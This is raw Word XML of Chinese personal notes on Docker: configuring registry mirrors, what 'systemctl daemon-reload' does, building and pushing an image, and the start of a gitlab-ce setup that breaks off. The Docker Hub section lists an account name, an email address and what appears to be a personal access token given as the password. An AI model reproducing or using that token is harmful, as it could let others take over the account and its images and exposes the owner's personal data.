    <w:p w14:paraId="11CF351F" w14:textId="77777777" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04"/>
    <w:p w14:paraId="25197FE4" w14:textId="77777777" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04"/>
    <w:p w14:paraId="46086526" w14:textId="77777777" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04"/>
    <w:p w14:paraId="3BE5D507" w14:textId="77777777" w:rsidR="00817F04" w:rsidRPr="00817F04" w:rsidRDefault="00817F04" w:rsidP="00817F04"/>
    <w:p w14:paraId="500394D6" w14:textId="77777777" w:rsidR="00817F04" w:rsidRDefault="00817F04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753ACE1D" w14:textId="248766C8" w:rsidR="00907581" w:rsidRDefault="00907581" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="106" w:name="_Toc159779567"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>换源</w:t>
      </w:r>
      <w:bookmarkEnd w:id="106"/>
    </w:p>
    <w:p w14:paraId="2997281E" w14:textId="77777777" w:rsidR="00907581" w:rsidRDefault="00907581" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1932E190" w14:textId="62561C6A" w:rsidR="00907581" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>vim /etc/docker/daemon.json</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AAA94B" w14:textId="77777777" w:rsidR="00707527" w:rsidRPr="00C7082C" w:rsidRDefault="00707527" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41F0785A" w14:textId="67F6751F" w:rsidR="00707527" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>``</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20730415" w14:textId="77777777" w:rsidR="00424545" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7770696D" w14:textId="77777777" w:rsidR="00424545" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    "registry-mirrors":[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E896599" w14:textId="77777777" w:rsidR="00424545" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "https://hub-mirror.c.163.com/",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680B60BE" w14:textId="77777777" w:rsidR="00424545" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        "https://docker.mirrors.ustc.edu.cn/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178B41C7" w14:textId="77777777" w:rsidR="00424545" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54672038" w14:textId="77777777" w:rsidR="00424545" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3186BED5" w14:textId="77777777" w:rsidR="00707527" w:rsidRPr="00C7082C" w:rsidRDefault="00707527" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BF7977" w14:textId="792EC2F3" w:rsidR="00907581" w:rsidRPr="00C7082C" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>``</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3507BF1F" w14:textId="77777777" w:rsidR="00907581" w:rsidRPr="00C7082C" w:rsidRDefault="00907581" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B7615D8" w14:textId="77777777" w:rsidR="00C7082C" w:rsidRPr="00C7082C" w:rsidRDefault="00C7082C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl daemon-reload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B3A44" w14:textId="3C30D569" w:rsidR="00424545" w:rsidRDefault="00C7082C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C7082C">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl restart docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594859FC" w14:textId="77777777" w:rsidR="00424545" w:rsidRDefault="00424545" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3867EB6A" w14:textId="6120D897" w:rsidR="00051CC7" w:rsidRPr="00051CC7" w:rsidRDefault="00051CC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051CC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>（个人见解：我感觉直接</w:t>
      </w:r>
      <w:r w:rsidRPr="007E560F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007E560F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ystemctl restart</w:t>
      </w:r>
      <w:r w:rsidRPr="00051CC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>不是深加载，而要确保完全加载更新的配置文件（不用重启服务器的那种），你还得最好执行</w:t>
      </w:r>
      <w:r w:rsidRPr="007E560F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="007E560F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ystemctl daemon-reload</w:t>
      </w:r>
      <w:r w:rsidRPr="00051CC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735DD998" w14:textId="77777777" w:rsidR="00051CC7" w:rsidRDefault="00051CC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00051CC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>systemctl daemon-reload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，用于重新加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统管理器的配置文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发行版（如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Debian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等）中的一个关键组件，它负责管理系统启动过程、服务、进程等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727193BA" w14:textId="77777777" w:rsidR="00051CC7" w:rsidRDefault="00051CC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3D3BFD" w14:textId="77777777" w:rsidR="00051CC7" w:rsidRDefault="00051CC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当您对系统服务（如修改或添加一个新的服务配置文件）进行更改时，您需要让</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新加载这些配置，以便它能识别这些更改。这就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl daemon-reload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的作用。执行此命令后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">systemd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将重新读取其配置文件，使得对服务配置的任何更改生效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A32FE4C" w14:textId="77777777" w:rsidR="00051CC7" w:rsidRDefault="00051CC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66384749" w14:textId="41529BF3" w:rsidR="00907581" w:rsidRDefault="00051CC7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，在对系统服务配置文件进行更改后，您需要首先执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl daemon-reload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后才能使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl restart </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl enable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等命令来管理这些服务。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C37A1F1" w14:textId="245FA52F" w:rsidR="009D2DD0" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc159779568"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:t>hub</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w14:paraId="0417EBAF" w14:textId="11DC8E86" w:rsidR="009D2DD0" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55547874" w14:textId="4FE2138C" w:rsidR="009D2DD0" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>senranja</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（不能大写）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BACD19" w14:textId="26480F88" w:rsidR="00AE0CCC" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="009D2DD0">
        <w:t>dckr_pat_ZC1DlG-qU8Y6gSoctVMfjpNOSwI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD603AA" w14:textId="03557782" w:rsidR="009D2DD0" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>henyanjian@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D66FB3" w14:textId="77777777" w:rsidR="009D2DD0" w:rsidRPr="009D2DD0" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25B8973E" w14:textId="147B1AE7" w:rsidR="009D2DD0" w:rsidRDefault="009D2DD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C3D6F3" w14:textId="47B75E02" w:rsidR="00247B94" w:rsidRDefault="00247B94" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc159779569"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hub</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w14:paraId="3EEF7DA3" w14:textId="419BBEB8" w:rsidR="00247B94" w:rsidRDefault="00247B94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="097CE5E7" w14:textId="38402193" w:rsidR="007039F1" w:rsidRDefault="002624AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ull: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF07C21" w14:textId="315C2D3C" w:rsidR="002624AC" w:rsidRPr="007039F1" w:rsidRDefault="007039F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="007039F1">
        <w:t>docker pull senranja/secret_detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5782E980" w14:textId="77777777" w:rsidR="002624AC" w:rsidRDefault="002624AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F30906" w14:textId="0430CA08" w:rsidR="00247B94" w:rsidRDefault="00247B94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ocker image build -t </w:t>
      </w:r>
      <w:r w:rsidR="002624AC">
        <w:t>senranja</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="003A5D9C" w:rsidRPr="007039F1">
        <w:t>secret_detection</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003A5D9C">
        <w:t>v2.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64992DE5" w14:textId="6D6D3208" w:rsidR="00247B94" w:rsidRDefault="00247B94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112561AF" w14:textId="2152A118" w:rsidR="00247B94" w:rsidRDefault="00247B94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t>ocker push username/repo:tag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE00A76" w14:textId="77777777" w:rsidR="00247B94" w:rsidRPr="00AE0CCC" w:rsidRDefault="00247B94" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D075FAC" w14:textId="26F71923" w:rsidR="00AE0CCC" w:rsidRDefault="00AE0CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc159779570"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作和命令</w:t>
      </w:r>
      <w:r w:rsidR="00B67F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：搭建</w:t>
      </w:r>
      <w:r w:rsidR="00B67F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00B67F4D">
        <w:t>itlab-ce</w:t>
      </w:r>
      <w:r w:rsidR="00B67F4D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="24856E2B" w14:textId="7FF29282" w:rsidR="00AE0CCC" w:rsidRDefault="00AE0CCC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35EBC698" w14:textId="77777777" w:rsidR="0017148A" w:rsidRDefault="003840EA" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:t>gitlab-ce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidR="00213B60" w:rsidRPr="00AA7449">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://blog.csdn.net/BThinker/article/details/124097795</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00213B60">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EB753F" w14:textId="1FBD22C6" w:rsidR="003840EA" w:rsidRDefault="00213B60" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面你会发现，映射的都是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴漏在外面的端口而不是容器本身服务开的端口，不要擅自修改为容器本身的端口，因为这些端口和地址是考虑到用户使用的时候直接访问的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>暴漏在外的端口，所以算是提前放置了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE0DBB" w14:textId="159184D8" w:rsidR="003840EA" w:rsidRDefault="003840EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA21801" w14:textId="77777777" w:rsidR="003840EA" w:rsidRDefault="003840EA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02F922C3" w14:textId="5447D91F" w:rsidR="000D124D" w:rsidRPr="00AF2230" w:rsidRDefault="00D667B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002A35BB" w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>查找镜像</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2660173D" w14:textId="6AD8E753" w:rsidR="002A35BB" w:rsidRDefault="002A35BB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ocker search gitlab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E02E47" w14:textId="77777777" w:rsidR="000D124D" w:rsidRDefault="000D124D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3025DFAE" w14:textId="77777777" w:rsidR="00D667B9" w:rsidRPr="00AF2230" w:rsidRDefault="00D667B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF2230">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
